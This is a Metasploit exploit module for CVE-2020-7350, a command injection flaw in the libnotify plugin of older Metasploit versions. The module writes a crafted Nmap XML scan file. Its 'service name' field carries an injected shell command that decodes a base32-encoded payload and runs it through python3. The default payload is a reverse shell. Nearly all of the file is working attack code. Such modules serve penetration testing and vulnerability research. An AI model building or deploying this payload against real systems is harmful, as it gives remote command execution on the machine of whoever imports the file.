This Metasploit module exploits a shell command injection vulnerability in the libnotify plugin. This vulnerability affects Metasploit versions 5.0.79 and earlier.
885145668200c03fca22ddeebb838fd3
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(update_info(info,
'Name' => 'Metasploit Libnotify Plugin Arbitrary Command Execution',
'Description' => %q(
This module exploits a shell command injection vulnerability in the
libnotify plugin. This vulnerability affects Metasploit versions
5.0.79 and earlier.
),
'DisclosureDate' => 'Mar 04 2020',
'License' => GPL_LICENSE,
'Author' =>
[
'pasta <[email protected]>' # Discovery and PoC
],
'References' =>
[
[ 'CVE', '2020-7350' ],
[ 'URL', 'https://github.com/rapid7/metasploit-framework/issues/13026' ]
],
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Payload' =>
{
'DisableNops' => true
},
'DefaultOptions' =>
{
'PAYLOAD' => 'cmd/unix/reverse_python'
},
'Targets' => [[ 'Automatic', {}]],
'Privileged' => false,
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [false, 'The file to write.', 'scan.xml']),
]
)
end
def exploit
xml = %(<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE nmaprun>
<nmaprun scanner="nmap" args="nmap -P0 -oA pepito 192.168.20.121" start="1583503480" startstr="Fri Mar 6 11:04:40 2020" version="7.60" xmloutputversion="1.04">
<host starttime="1583503480" endtime="1583503480"><status state="up" reason="user-set" reason_ttl="0"/>
<address addr="192.168.20.121" addrtype="ipv4"/>
<hostnames>
</hostnames>
<ports>
<port protocol="tcp" portid="22"><state state="open" reason="syn-ack" reason_ttl="0"/><service name="ssh';python3 -c "import os,base64;os.system(base64.b32decode(b'#{Rex::Text.encode_base32(payload.encoded)}'.upper()))"&; printf '" method="table" conf="3"/></port>
</ports>
<times srtt="6174" rttvar="435" to="100000"/>
</host>
<runstats><finished time="1583503480" timestr="Fri Mar 6 11:04:40 2020" elapsed="0.22" summary="Nmap done at Fri Mar 6 11:04:40 2020; 1 IP address (1 host up) scanned in 0.22 seconds" exit="success"/><hosts up="1" down="0" total="1"/>
</runstats>
</nmaprun>
)
print_status "Writing xml file: #{datastore['FILENAME']}"
file_create xml
end
end